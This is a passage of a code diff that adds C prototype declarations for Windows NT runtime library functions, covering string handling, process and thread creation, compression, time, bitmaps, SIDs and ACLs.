struct in6_addr *Address, + OUT PULONG ScopeId, + OUT PUSHORT Port + ); + +NTSTATUS +NTAPI +RtlIpv4StringToAddressW ( + IN PCWSTR S, + IN BOOLEAN Strict, + OUT LPCWSTR *Terminator, + OUT struct in_addr *Addr + ); + +NTSTATUS +NTAPI +RtlIpv6StringToAddressW ( + IN PCWSTR S, + OUT PCWSTR *Terminator, + OUT struct in6_addr *Addr + ); + +NTSTATUS +NTAPI +RtlIpv4StringToAddressExW ( + IN PCWSTR AddressString, + IN BOOLEAN Strict, + OUT struct in_addr *Address, + OUT PUSHORT Port + ); + +NTSTATUS +NTAPI +RtlIpv6StringToAddressExW ( + IN PCWSTR AddressString, + OUT struct in6_addr *Address, + OUT PULONG ScopeId, + OUT PUSHORT Port + ); + +NTSTATUS +NTAPI +RtlIntegerToUnicodeString ( + ULONG Value, + ULONG Base, + PUNICODE_STRING String + ); + +NTSTATUS +NTAPI +RtlInt64ToUnicodeString ( + IN ULONGLONG Value, + IN ULONG Base OPTIONAL, + IN OUT PUNICODE_STRING String + ); + +NTSTATUS +NTAPI +RtlUnicodeStringToInteger ( + PCUNICODE_STRING String, + ULONG Base, + PULONG Value + ); + +VOID +NTAPI +RtlInitString( + PSTRING DestinationString, + PCSZ SourceString + ); + +VOID +NTAPI +RtlInitAnsiString( + PANSI_STRING DestinationString, + PCSZ SourceString + ); + +NTSTATUS +NTAPI +RtlInitUnicodeString( + PUNICODE_STRING DestinationString, + PCWSTR SourceString + ); + +NTSTATUS +NTAPI +RtlInitUnicodeStringEx( + PUNICODE_STRING DestinationString, + PCWSTR SourceString + ); + +NTSTATUS +NTAPI +RtlInitAnsiStringEx( + OUT PANSI_STRING DestinationString, + IN PCSZ SourceString OPTIONAL + ); + +BOOLEAN +NTAPI +RtlCreateUnicodeString( + OUT PUNICODE_STRING DestinationString, + IN PCWSTR SourceString + ); + +BOOLEAN +NTAPI +RtlEqualDomainName( + IN PCUNICODE_STRING String1, + IN PCUNICODE_STRING String2 + ); + +BOOLEAN +NTAPI +RtlEqualComputerName( + IN PCUNICODE_STRING String1, + IN PCUNICODE_STRING String2 + ); + +NTSTATUS +RtlDnsHostNameToComputerName( + OUT PUNICODE_STRING ComputerNameString, + IN PCUNICODE_STRING DnsHostNameString, + IN BOOLEAN AllocateComputerNameString + ); + +BOOLEAN +NTAPI +RtlCreateUnicodeStringFromAsciiz( + OUT PUNICODE_STRING DestinationString, + IN PCSZ SourceString + ); + +VOID +NTAPI +RtlCopyString( + PSTRING DestinationString, + const STRING * SourceString + ); + +CHAR +NTAPI +RtlUpperChar ( + CHAR Character + ); + +LONG +NTAPI +RtlCompareString( + const STRING * String1, + const STRING * String2, + BOOLEAN CaseInSensitive + ); + +BOOLEAN +NTAPI +RtlEqualString( + const STRING * String1, + const STRING * String2, + BOOLEAN CaseInSensitive + ); + +BOOLEAN +NTAPI +RtlPrefixString( + const STRING * String1, + const STRING * String2, + BOOLEAN CaseInSensitive + ); + +VOID +NTAPI +RtlUpperString( + PSTRING DestinationString, + const STRING * SourceString + ); + +NTSTATUS +NTAPI +RtlAppendAsciizToString ( + PSTRING Destination, + PCSZ Source + ); + +NTSTATUS +NTAPI +RtlAppendStringToString ( + PSTRING Destination, + const STRING * Source + ); + +NTSTATUS +NTAPI +RtlAnsiStringToUnicodeString( + PUNICODE_STRING DestinationString, + PCANSI_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +WCHAR +NTAPI +RtlAnsiCharToUnicodeChar( + PUCHAR *SourceCharacter + ); + +NTSTATUS +NTAPI +RtlUnicodeStringToAnsiString( + PANSI_STRING DestinationString, + PCUNICODE_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlUpcaseUnicodeStringToAnsiString( + PANSI_STRING DestinationString, + PCUNICODE_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlOemStringToUnicodeString( + PUNICODE_STRING DestinationString, + PCOEM_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlUnicodeStringToOemString( + POEM_STRING DestinationString, + PCUNICODE_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlUpcaseUnicodeStringToOemString( + POEM_STRING DestinationString, + PCUNICODE_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlOemStringToCountedUnicodeString( + PUNICODE_STRING DestinationString, + PCOEM_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlUnicodeStringToCountedOemString( + POEM_STRING DestinationString, + PCUNICODE_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlUpcaseUnicodeStringToCountedOemString( + POEM_STRING DestinationString, + PCUNICODE_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +LONG +NTAPI +RtlCompareUnicodeString( + PCUNICODE_STRING String1, + PCUNICODE_STRING String2, + BOOLEAN CaseInSensitive + ); + +BOOLEAN +NTAPI +RtlEqualUnicodeString( + PCUNICODE_STRING String1, + PCUNICODE_STRING String2, + BOOLEAN CaseInSensitive + ); + +NTSTATUS +NTAPI +RtlHashUnicodeString( + IN const UNICODE_STRING *String, + IN BOOLEAN CaseInSensitive, + IN ULONG HashAlgorithm, + OUT PULONG HashValue + ); + +NTSTATUS +NTAPI +RtlValidateUnicodeString( + IN ULONG Flags, + IN const UNICODE_STRING *String + ); + +NTSTATUS +NTAPI +RtlDuplicateUnicodeString( + IN ULONG Flags, + IN const UNICODE_STRING *StringIn, + OUT UNICODE_STRING *StringOut + ); + +BOOLEAN +NTAPI +RtlPrefixUnicodeString( + IN PCUNICODE_STRING String1, + IN PCUNICODE_STRING String2, + IN BOOLEAN CaseInSensitive + ); + +NTSTATUS +NTAPI +RtlUpcaseUnicodeString( + PUNICODE_STRING DestinationString, + PCUNICODE_STRING SourceString, + BOOLEAN AllocateDestinationString + ); + +NTSTATUS +NTAPI +RtlFindCharInUnicodeString( + IN ULONG Flags, + IN PCUNICODE_STRING StringToSearch, + IN PCUNICODE_STRING CharSet, + OUT USHORT *NonInclusivePrefixLength + ); + +VOID +NTAPI +RtlCopyUnicodeString( + PUNICODE_STRING DestinationString, + PCUNICODE_STRING SourceString + ); + +NTSTATUS +NTAPI +RtlAppendUnicodeStringToString ( + PUNICODE_STRING Destination, + PCUNICODE_STRING Source + ); + +NTSTATUS +NTAPI +RtlAppendUnicodeToString ( + PUNICODE_STRING Destination, + PCWSTR Source + ); + +WCHAR +NTAPI +RtlUpcaseUnicodeChar( + WCHAR SourceCharacter + ); + +WCHAR +NTAPI +RtlDowncaseUnicodeChar( + WCHAR SourceCharacter + ); + +VOID +NTAPI +RtlFreeUnicodeString( + PUNICODE_STRING UnicodeString + ); + +VOID +NTAPI +RtlFreeAnsiString( + PANSI_STRING AnsiString + ); + +VOID +NTAPI +RtlFreeOemString( + POEM_STRING OemString + ); + +ULONG +NTAPI +RtlxUnicodeStringToAnsiSize( + PCUNICODE_STRING UnicodeString + ); + +ULONG +NTAPI +RtlxUnicodeStringToOemSize( + PCUNICODE_STRING UnicodeString + ); + +ULONG +NTAPI +RtlxAnsiStringToUnicodeSize( + PCANSI_STRING AnsiString + ); + +ULONG +NTAPI +RtlxOemStringToUnicodeSize( + PCOEM_STRING OemString + ); + +NTSTATUS +NTAPI +RtlMultiByteToUnicodeN( + OUT PWCH UnicodeString, + IN ULONG MaxBytesInUnicodeString, + OUT OPTIONAL PULONG BytesInUnicodeString, + IN PCSTR MultiByteString, + IN ULONG BytesInMultiByteString + ); + +NTSTATUS +NTAPI +RtlMultiByteToUnicodeSize( + PULONG BytesInUnicodeString, + PCSTR MultiByteString, + ULONG BytesInMultiByteString + ); + +NTSTATUS +NTAPI +RtlUnicodeToMultiByteSize( + OUT PULONG BytesInMultiByteString, + IN PWCH UnicodeString, + IN ULONG BytesInUnicodeString + ); + +NTSTATUS +NTAPI +RtlUnicodeToMultiByteN( + OUT PCHAR MultiByteString, + IN ULONG MaxBytesInMultiByteString, + OUT OPTIONAL PULONG BytesInMultiByteString, + IN PWCH UnicodeString, + IN ULONG BytesInUnicodeString + ); + +NTSTATUS +NTAPI +RtlUpcaseUnicodeToMultiByteN( + OUT PCHAR MultiByteString, + IN ULONG MaxBytesInMultiByteString, + OUT OPTIONAL PULONG BytesInMultiByteString, + IN PWCH UnicodeString, + IN ULONG BytesInUnicodeString + ); + +NTSTATUS +NTAPI +RtlOemToUnicodeN( + OUT PWSTR UnicodeString, + IN ULONG MaxBytesInUnicodeString, + OUT OPTIONAL PULONG BytesInUnicodeString, + IN PCH OemString, + IN ULONG BytesInOemString + ); + +NTSTATUS +NTAPI +RtlUnicodeToOemN( + OUT PCHAR OemString, + IN ULONG MaxBytesInOemString, + OUT OPTIONAL PULONG BytesInOemString, + IN PWCH UnicodeString, + IN ULONG BytesInUnicodeString + ); + +NTSTATUS +NTAPI +RtlUpcaseUnicodeToOemN( + OUT PCHAR OemString, + IN ULONG MaxBytesInOemString, + OUT OPTIONAL PULONG BytesInOemString, + IN PWCH UnicodeString, + IN ULONG BytesInUnicodeString + ); + +NTSTATUS +NTAPI +RtlConsoleMultiByteToUnicodeN( + OUT PWCH UnicodeString, + IN ULONG MaxBytesInUnicodeString, + OUT OPTIONAL PULONG BytesInUnicodeString OPTIONAL, + IN PCH MultiByteString, + IN ULONG BytesInMultiByteString, + OUT PULONG pdwSpecialChar ); + +BOOLEAN +NTAPI +RtlIsTextUnicode( + IN CONST VOID* Buffer, + IN ULONG Size, + IN OUT PULONG Result OPTIONAL + ); + +NTSTATUS +NTAPI +RtlStringFromGUID( + IN REFGUID Guid, + OUT PUNICODE_STRING GuidString + ); + +NTSTATUS +NTAPI +RtlGUIDFromString( + IN PUNICODE_STRING GuidString, + OUT GUID* Guid + ); + +VOID +NTAPI +RtlGenerate8dot3Name ( + IN PUNICODE_STRING Name, + IN BOOLEAN AllowExtendedCharacters, + IN OUT PGENERATE_NAME_CONTEXT Context, + OUT PUNICODE_STRING Name8dot3 + ); + +BOOLEAN +NTAPI +RtlIsNameLegalDOS8Dot3 ( + IN PUNICODE_STRING Name, + IN OUT POEM_STRING OemName OPTIONAL, + IN OUT PBOOLEAN NameContainsSpaces OPTIONAL + ); + +VOID +NTAPI +RtlInitializeContext( + HANDLE Process, + PCONTEXT Context, + PVOID Parameter, + PVOID InitialPc, + PVOID InitialSp + ); + +NTSTATUS +NTAPI +RtlRemoteCall( + HANDLE Process, + HANDLE Thread, + PVOID CallSite, + ULONG ArgumentCount, + PULONG_PTR Arguments, + BOOLEAN PassContext, + BOOLEAN AlreadySuspended + ); + +VOID +NTAPI +RtlAcquirePebLock( + ); + +VOID +NTAPI +RtlReleasePebLock( + ); + +NTSTATUS +NTAPI +RtlAllocateFromPeb( + ULONG Size, + PVOID *Block + ); + +NTSTATUS +NTAPI +RtlFreeToPeb( + PVOID Block, + ULONG Size + ); + +NTSTATUS +STDAPIVCALLTYPE +RtlSetProcessIsCritical( + IN BOOLEAN NewValue, + OUT PBOOLEAN OldValue OPTIONAL, + IN BOOLEAN CheckFlag + ); + +NTSTATUS +STDAPIVCALLTYPE +RtlSetThreadIsCritical( + IN BOOLEAN NewValue, + OUT PBOOLEAN OldValue OPTIONAL, + IN BOOLEAN CheckFlag + ); + +NTSTATUS +NTAPI +RtlCreateEnvironment( + BOOLEAN CloneCurrentEnvironment, + PVOID *Environment + ); + +NTSTATUS +NTAPI +RtlDestroyEnvironment( + PVOID Environment + ); + +NTSTATUS +NTAPI +RtlSetCurrentEnvironment( + PVOID Environment, + PVOID *PreviousEnvironment + ); + +NTSTATUS +NTAPI +RtlSetEnvironmentVariable( + PVOID *Environment, + PCUNICODE_STRING Name, + PCUNICODE_STRING Value + ); + +ULONG +RtlIsDosDeviceName_U( + IN PWSTR DosFileName + ); + +NTSTATUS +NTAPI +RtlQueryEnvironmentVariable_U ( + PVOID Environment, + PCUNICODE_STRING Name, + PUNICODE_STRING Value + ); + +NTSTATUS +NTAPI +RtlExpandEnvironmentStrings_U( + IN PVOID Environment OPTIONAL, + IN PCUNICODE_STRING Source, + OUT PUNICODE_STRING Destination, + OUT PULONG ReturnedLength OPTIONAL + ); + +VOID +NTAPI +PfxInitialize ( + PPREFIX_TABLE PrefixTable + ); + +BOOLEAN +NTAPI +PfxInsertPrefix ( + PPREFIX_TABLE PrefixTable, + PSTRING Prefix, + PPREFIX_TABLE_ENTRY PrefixTableEntry + ); + +VOID +NTAPI +PfxRemovePrefix ( + PPREFIX_TABLE PrefixTable, + PPREFIX_TABLE_ENTRY PrefixTableEntry + ); + +PPREFIX_TABLE_ENTRY +NTAPI +PfxFindPrefix ( + PPREFIX_TABLE PrefixTable, + PSTRING FullName + ); + +VOID +NTAPI +RtlInitializeUnicodePrefix ( + PUNICODE_PREFIX_TABLE PrefixTable + ); + +BOOLEAN +NTAPI +RtlInsertUnicodePrefix ( + PUNICODE_PREFIX_TABLE PrefixTable, + PUNICODE_STRING Prefix, + PUNICODE_PREFIX_TABLE_ENTRY PrefixTableEntry + ); + +VOID +NTAPI +RtlRemoveUnicodePrefix ( + PUNICODE_PREFIX_TABLE PrefixTable, + PUNICODE_PREFIX_TABLE_ENTRY PrefixTableEntry + ); + +PUNICODE_PREFIX_TABLE_ENTRY +NTAPI +RtlFindUnicodePrefix ( + PUNICODE_PREFIX_TABLE PrefixTable, + PUNICODE_STRING FullName, + ULONG CaseInsensitiveIndex + ); + +PUNICODE_PREFIX_TABLE_ENTRY +NTAPI +RtlNextUnicodePrefix ( + PUNICODE_PREFIX_TABLE PrefixTable, + BOOLEAN Restart + ); + +NTSTATUS +NTAPI +RtlGetCompressionWorkSpaceSize ( + IN USHORT CompressionFormatAndEngine, + OUT PULONG CompressBufferWorkSpaceSize, + OUT PULONG CompressFragmentWorkSpaceSize + ); + +NTSTATUS +NTAPI +RtlCompressBuffer ( + IN USHORT CompressionFormatAndEngine, + IN PUCHAR UncompressedBuffer, + IN ULONG UncompressedBufferSize, + OUT PUCHAR CompressedBuffer, + IN ULONG CompressedBufferSize, + IN ULONG UncompressedChunkSize, + OUT PULONG FinalCompressedSize, + IN PVOID WorkSpace + ); + +NTSTATUS +NTAPI +RtlDecompressBuffer ( + IN USHORT CompressionFormat, + OUT PUCHAR UncompressedBuffer, + IN ULONG UncompressedBufferSize, + IN PUCHAR CompressedBuffer, + IN ULONG CompressedBufferSize, + OUT PULONG FinalUncompressedSize + ); + +NTSTATUS +NTAPI +RtlDecompressFragment ( + IN USHORT CompressionFormat, + OUT PUCHAR UncompressedFragment, + IN ULONG UncompressedFragmentSize, + IN PUCHAR CompressedBuffer, + IN ULONG CompressedBufferSize, + IN ULONG FragmentOffset, + OUT PULONG FinalUncompressedSize, + IN PVOID WorkSpace + ); + +NTSTATUS +NTAPI +RtlDescribeChunk ( + IN USHORT CompressionFormat, + IN OUT PUCHAR *CompressedBuffer, + IN PUCHAR EndOfCompressedBufferPlus1, + OUT PUCHAR *ChunkBuffer, + OUT PULONG ChunkSize + ); + +NTSTATUS +NTAPI +RtlReserveChunk ( + IN USHORT CompressionFormat, + IN OUT PUCHAR *CompressedBuffer, + IN PUCHAR EndOfCompressedBufferPlus1, + OUT PUCHAR *ChunkBuffer, + IN ULONG ChunkSize + ); + +NTSTATUS +NTAPI +RtlDecompressChunks ( + OUT PUCHAR UncompressedBuffer, + IN ULONG UncompressedBufferSize, + IN PUCHAR CompressedBuffer, + IN ULONG CompressedBufferSize, + IN PUCHAR CompressedTail, + IN ULONG CompressedTailSize, + IN PCOMPRESSED_DATA_INFO CompressedDataInfo + ); + +NTSTATUS +NTAPI +RtlCompressChunks ( + IN PUCHAR UncompressedBuffer, + IN ULONG UncompressedBufferSize, + OUT PUCHAR CompressedBuffer, + IN ULONG CompressedBufferSize, + IN OUT PCOMPRESSED_DATA_INFO CompressedDataInfo, + IN ULONG CompressedDataInfoLength, + IN PVOID WorkSpace + ); + +NTSTATUS +NTAPI +RtlCreateProcessParameters( + PRTL_USER_PROCESS_PARAMETERS *ProcessParameters, + PUNICODE_STRING ImagePathName, + PUNICODE_STRING DllPath, + PUNICODE_STRING CurrentDirectory, + PUNICODE_STRING CommandLine, + PVOID Environment, + PUNICODE_STRING WindowTitle, + PUNICODE_STRING DesktopInfo, + PUNICODE_STRING ShellInfo, + PUNICODE_STRING RuntimeData + ); + +NTSTATUS +NTAPI +RtlDestroyProcessParameters( + PRTL_USER_PROCESS_PARAMETERS ProcessParameters + ); + +PRTL_USER_PROCESS_PARAMETERS +NTAPI +RtlNormalizeProcessParams( + PRTL_USER_PROCESS_PARAMETERS ProcessParameters + ); + +PRTL_USER_PROCESS_PARAMETERS +NTAPI +RtlDeNormalizeProcessParams( + PRTL_USER_PROCESS_PARAMETERS ProcessParameters + ); + +NTSTATUS +NTAPI +RtlCreateUserProcess( + PUNICODE_STRING NtImagePathName, + ULONG Attributes, + PRTL_USER_PROCESS_PARAMETERS ProcessParameters, + PSECURITY_DESCRIPTOR ProcessSecurityDescriptor, + PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, + HANDLE ParentProcess, + BOOLEAN InheritHandles, + HANDLE DebugPort, + HANDLE ExceptionPort, + PRTL_USER_PROCESS_INFORMATION ProcessInformation + ); + +NTSTATUS +NTAPI +RtlCreateUserThread( + HANDLE Process, + PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, + BOOLEAN CreateSuspended, + ULONG StackZeroBits, + SIZE_T MaximumStackSize OPTIONAL, + SIZE_T InitialStackSize OPTIONAL, + PUSER_THREAD_START_ROUTINE StartAddress, + PVOID Parameter, + PHANDLE Thread, + PCLIENT_ID ClientId + ); + +VOID +NTAPI +RtlExitUserThread ( + IN NTSTATUS ExitStatus + ); + +VOID +NTAPI +RtlFreeUserThreadStack( + HANDLE hProcess, + HANDLE hThread + ); +/* +PVOID +NTAPI +RtlPcToFileHeader( + PVOID PcValue, + PVOID *BaseOfImage + );*/ + +NTSTATUS +NTAPI +RtlImageNtHeaderEx( + ULONG Flags, + PVOID Base, + ULONG64 Size, + OUT PIMAGE_NT_HEADERS * OutHeaders + ); + +PIMAGE_NT_HEADERS +NTAPI +RtlImageNtHeader( + PVOID Base + ); + +PVOID +NTAPI +RtlAddressInSectionTable ( + IN PIMAGE_NT_HEADERS NtHeaders, + IN PVOID BaseOfImage, + IN ULONG VirtualAddress + ); + +PIMAGE_SECTION_HEADER +NTAPI +RtlSectionTableFromVirtualAddress ( + IN PIMAGE_NT_HEADERS NtHeaders, + IN PVOID BaseOfImage, + IN ULONG VirtualAddress + ); + +NTSTATUS +NTAPI +RtlImageDirectoryEntryToData( + PVOID BaseOfImage, + BOOLEAN MappedAsImage, + USHORT DirectoryEntry, + PULONG Size + ); + +PVOID +RtlImageDirectoryEntryToData32 ( + IN PVOID Base, + IN BOOLEAN MappedAsImage, + IN USHORT DirectoryEntry, + OUT PULONG Size + ); + +PIMAGE_SECTION_HEADER +NTAPI +RtlImageRvaToSection( + IN PIMAGE_NT_HEADERS NtHeaders, + IN PVOID Base, + IN ULONG Rva + ); + +PVOID +NTAPI +RtlImageRvaToVa( + IN PIMAGE_NT_HEADERS NtHeaders, + IN PVOID Base, + IN ULONG Rva, + IN OUT PIMAGE_SECTION_HEADER *LastRvaSection OPTIONAL + ); + + +VOID +NTAPI +RtlCopyMemoryNonTemporal ( + VOID UNALIGNED *Destination, + CONST VOID UNALIGNED *Source, + SIZE_T Length + ); + +VOID __fastcall +RtlPrefetchMemoryNonTemporal( + IN PVOID Source, + IN SIZE_T Length + ); + +SIZE_T +NTAPI +RtlCompareMemoryUlong ( + PVOID Source, + SIZE_T Length, + ULONG Pattern + ); + +VOID +NTAPI +RtlFillMemoryUlong ( + PVOID Destination, + SIZE_T Length, + ULONG Pattern + ); + +VOID +NTAPI +RtlFillMemoryUlonglong ( + PVOID Destination, + SIZE_T Length, + ULONGLONG Pattern + ); + +VOID +NTAPI +RtlInitializeExceptionLog( + IN ULONG Entries + ); + +LONG +NTAPI +RtlUnhandledExceptionFilter( + IN struct _EXCEPTION_POINTERS *ExceptionInfo + ); + +LONG +NTAPI +RtlUnhandledExceptionFilter2( + IN struct _EXCEPTION_POINTERS *ExceptionInfo, + IN PCSTR Function + ); + +VOID +NTAPI +DbgUserBreakPoint( + VOID + ); + +VOID +NTAPI +DbgBreakPointWithStatus( + IN ULONG Status + ); + +ULONG +DbgPrintEx ( + IN ULONG ComponentId, + IN ULONG Level, + IN PCH Format, + ... + ); + +ULONG +NTAPI +vDbgPrintEx( + IN ULONG ComponentId, + IN ULONG Level, + IN PCH Format, + IN va_list arglist + ); + +ULONG +NTAPI +vDbgPrintExWithPrefix ( + IN PCH Prefix, + IN ULONG ComponentId, + IN ULONG Level, + IN PCH Format, + IN va_list arglist + ); + +ULONG +DbgPrintReturnControlC ( + IN PCHAR Format, + ... + ); + +NTSTATUS +NTAPI +DbgQueryDebugFilterState ( + IN ULONG ComponentId, + IN ULONG Level + ); + +NTSTATUS +NTAPI +DbgSetDebugFilterState ( + IN ULONG ComponentId, + IN ULONG Level, + IN BOOLEAN State + ); + +ULONG +NTAPI +DbgPrompt ( + IN PCH Prompt, + OUT PCH Response, + IN ULONG Length + ); + +VOID +NTAPI +DbgLoadImageSymbols ( + IN PSTRING FileName, + IN PVOID ImageBase, + IN ULONG_PTR ProcessId + ); + +VOID +NTAPI +DbgUnLoadImageSymbols ( + IN PSTRING FileName, + IN PVOID ImageBase, + IN ULONG_PTR ProcessId + ); + +VOID +NTAPI +DbgCommandString ( + IN PCH Name, + IN PCH Command + ); + +BOOLEAN +NTAPI +RtlCutoverTimeToSystemTime( + PTIME_FIELDS CutoverTime, + PLARGE_INTEGER SystemTime, + PLARGE_INTEGER CurrentSystemTime, + BOOLEAN ThisYear + ); + +NTSTATUS +NTAPI +RtlSystemTimeToLocalTime ( + IN PLARGE_INTEGER SystemTime, + OUT PLARGE_INTEGER LocalTime + ); + +NTSTATUS +NTAPI +RtlLocalTimeToSystemTime ( + IN PLARGE_INTEGER LocalTime, + OUT PLARGE_INTEGER SystemTime + ); + +VOID +NTAPI +RtlTimeToElapsedTimeFields ( + IN PLARGE_INTEGER Time, + OUT PTIME_FIELDS TimeFields + ); + +VOID +NTAPI +RtlTimeToTimeFields ( + PLARGE_INTEGER Time, + PTIME_FIELDS TimeFields + ); + +BOOLEAN +NTAPI +RtlTimeFieldsToTime ( + PTIME_FIELDS TimeFields, + PLARGE_INTEGER Time + ); + +BOOLEAN +NTAPI +RtlTimeToSecondsSince1980 ( + PLARGE_INTEGER Time, + PULONG ElapsedSeconds + ); + +VOID +NTAPI +RtlSecondsSince1980ToTime ( + ULONG ElapsedSeconds, + PLARGE_INTEGER Time + ); + +BOOLEAN +NTAPI +RtlTimeToSecondsSince1970 ( + PLARGE_INTEGER Time, + PULONG ElapsedSeconds + ); + +VOID +NTAPI +RtlSecondsSince1970ToTime ( + ULONG ElapsedSeconds, + PLARGE_INTEGER Time + ); + +NTSTATUS +NTAPI +RtlQueryTimeZoneInformation( + OUT PRTL_TIME_ZONE_INFORMATION TimeZoneInformation + ); + +NTSTATUS +NTAPI +RtlSetTimeZoneInformation( + IN PRTL_TIME_ZONE_INFORMATION TimeZoneInformation + ); + +NTSTATUS +NTAPI +RtlSetActiveTimeBias( + IN LONG ActiveBias + ); + +VOID +NTAPI +RtlInitializeBitMap ( + PRTL_BITMAP BitMapHeader, + PULONG BitMapBuffer, + ULONG SizeOfBitMap + ); + +VOID +NTAPI +RtlClearBit ( + PRTL_BITMAP BitMapHeader, + ULONG BitNumber + ); + +VOID +NTAPI +RtlSetBit ( + PRTL_BITMAP BitMapHeader, + ULONG BitNumber + ); + +BOOLEAN +NTAPI +RtlTestBit ( + PRTL_BITMAP BitMapHeader, + ULONG BitNumber + ); + +VOID +NTAPI +RtlClearAllBits ( + PRTL_BITMAP BitMapHeader + ); + +VOID +NTAPI +RtlSetAllBits ( + PRTL_BITMAP BitMapHeader + ); + +ULONG +NTAPI +RtlFindClearBits ( + PRTL_BITMAP BitMapHeader, + ULONG NumberToFind, + ULONG HintIndex + ); + +ULONG +NTAPI +RtlFindSetBits ( + PRTL_BITMAP BitMapHeader, + ULONG NumberToFind, + ULONG HintIndex + ); + +ULONG +NTAPI +RtlFindClearBitsAndSet ( + PRTL_BITMAP BitMapHeader, + ULONG NumberToFind, + ULONG HintIndex + ); + +ULONG +NTAPI +RtlFindSetBitsAndClear ( + PRTL_BITMAP BitMapHeader, + ULONG NumberToFind, + ULONG HintIndex + ); + +VOID +NTAPI +RtlClearBits ( + PRTL_BITMAP BitMapHeader, + ULONG StartingIndex, + ULONG NumberToClear + ); + +VOID +NTAPI +RtlSetBits ( + PRTL_BITMAP BitMapHeader, + ULONG StartingIndex, + ULONG NumberToSet + ); + +ULONG +NTAPI +RtlFindClearRuns ( + PRTL_BITMAP BitMapHeader, + PRTL_BITMAP_RUN RunArray, + ULONG SizeOfRunArray, + BOOLEAN LocateLongestRuns + ); + +ULONG +NTAPI +RtlFindLongestRunClear ( + PRTL_BITMAP BitMapHeader, + PULONG StartingIndex + ); + +ULONG +NTAPI +RtlFindFirstRunClear ( + PRTL_BITMAP BitMapHeader, + PULONG StartingIndex + ); + +ULONG +NTAPI +RtlNumberOfClearBits ( + PRTL_BITMAP BitMapHeader + ); + +ULONG +NTAPI +RtlNumberOfSetBits ( + PRTL_BITMAP BitMapHeader + ); + +BOOLEAN +NTAPI +RtlAreBitsClear ( + PRTL_BITMAP BitMapHeader, + ULONG StartingIndex, + ULONG Length + ); + +BOOLEAN +NTAPI +RtlAreBitsSet ( + PRTL_BITMAP BitMapHeader, + ULONG StartingIndex, + ULONG Length + ); + +ULONG +NTAPI +RtlFindNextForwardRunClear ( + IN PRTL_BITMAP BitMapHeader, + IN ULONG FromIndex, + IN PULONG StartingRunIndex + ); + +ULONG +NTAPI +RtlFindLastBackwardRunClear ( + IN PRTL_BITMAP BitMapHeader, + IN ULONG FromIndex, + IN PULONG StartingRunIndex + ); + +CCHAR +NTAPI +RtlFindLeastSignificantBit ( + IN ULONGLONG Set + ); + +CCHAR +NTAPI +RtlFindMostSignificantBit ( + IN ULONGLONG Set + ); + +BOOLEAN +NTAPI +RtlValidSid ( + PSID Sid + ); + +BOOLEAN +NTAPI +RtlEqualSid ( + PSID Sid1, + PSID Sid2 + ); + +BOOLEAN +NTAPI +RtlEqualPrefixSid ( + PSID Sid1, + PSID Sid2 + ); + +ULONG +NTAPI +RtlLengthRequiredSid ( + ULONG SubAuthorityCount + ); + +PVOID +NTAPI +RtlFreeSid( + IN PSID Sid + ); + +NTSTATUS +NTAPI +RtlInitializeSid( + OUT PSID Sid, + IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, + IN UCHAR SubAuthorityCount + ); + +NTSTATUS +NTAPI +RtlAllocateAndInitializeSid( + IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, + IN UCHAR SubAuthorityCount, + IN ULONG SubAuthority0, + IN ULONG SubAuthority1, + IN ULONG SubAuthority2, + IN ULONG SubAuthority3, + IN ULONG SubAuthority4, + IN ULONG SubAuthority5, + IN ULONG SubAuthority6, + IN ULONG SubAuthority7, + OUT PSID *Sid + ); + +PSID_IDENTIFIER_AUTHORITY +NTAPI +RtlIdentifierAuthoritySid ( + PSID Sid + ); + +PULONG +NTAPI +RtlSubAuthoritySid( + IN PSID Sid, + IN ULONG SubAuthority + ); + +PUCHAR +NTAPI +RtlSubAuthorityCountSid ( + PSID Sid + ); + +ULONG +NTAPI +RtlLengthSid ( + PSID Sid + ); + +NTSTATUS +NTAPI +RtlCopySid ( + ULONG DestinationSidLength, + PSID DestinationSid, + PSID SourceSid + ); + +NTSTATUS +NTAPI +RtlCopySidAndAttributesArray ( + ULONG ArrayLength, + PSID_AND_ATTRIBUTES Source, + ULONG TargetSidBufferSize, + PSID_AND_ATTRIBUTES TargetArrayElement, + PSID TargetSid, + PSID *NextTargetSid, + PULONG RemainingTargetSidSize + ); + +NTSTATUS +NTAPI +RtlLengthSidAsUnicodeString( + PSID Sid, + PULONG StringLength + ); + +NTSTATUS +NTAPI +RtlConvertSidToUnicodeString( + PUNICODE_STRING UnicodeString, + PSID Sid, + BOOLEAN AllocateDestinationString + ); + +VOID +NTAPI +RtlCopyLuid ( + PLUID DestinationLuid, + PLUID SourceLuid + ); + +VOID +NTAPI +RtlCopyLuidAndAttributesArray ( + ULONG ArrayLength, + PLUID_AND_ATTRIBUTES Source, + PLUID_AND_ATTRIBUTES Target + ); + +BOOLEAN +NTAPI +RtlAreAllAccessesGranted( + ACCESS_MASK GrantedAccess, + ACCESS_MASK DesiredAccess + ); + +BOOLEAN +NTAPI +RtlAreAnyAccessesGranted( + ACCESS_MASK GrantedAccess, + ACCESS_MASK DesiredAccess + ); + +VOID +NTAPI +RtlMapGenericMask( + PACCESS_MASK AccessMask, + PGENERIC_MAPPING GenericMapping + ); + +NTSTATUS +NTAPI +RtlCreateAcl( + OUT PACL Acl, + IN ULONG AclLength, + IN ULONG AclRevision + ); + +BOOLEAN +NTAPI +RtlValidAcl( + PACL Acl + ); + +NTSTATUS +NTAPI +RtlQueryInformationAcl( + PACL Acl, + PVOID AclInformation, + ULONG AclInformationLength, + ACL_INFORMATION_CLASS AclInformationClass + ); + +NTSTATUS +NTAPI +RtlSetInformationAcl( + PACL Acl, + PVOID AclInformation, + ULONG AclInformationLength, + ACL_INFORMATION_CLASS AclInformationClass + ); + +NTSTATUS +NTAPI +RtlAddAce( + PACL Acl, + ULONG AceRevision, + ULONG StartingAceIndex, + PVOID AceList, + ULONG AceListLength + 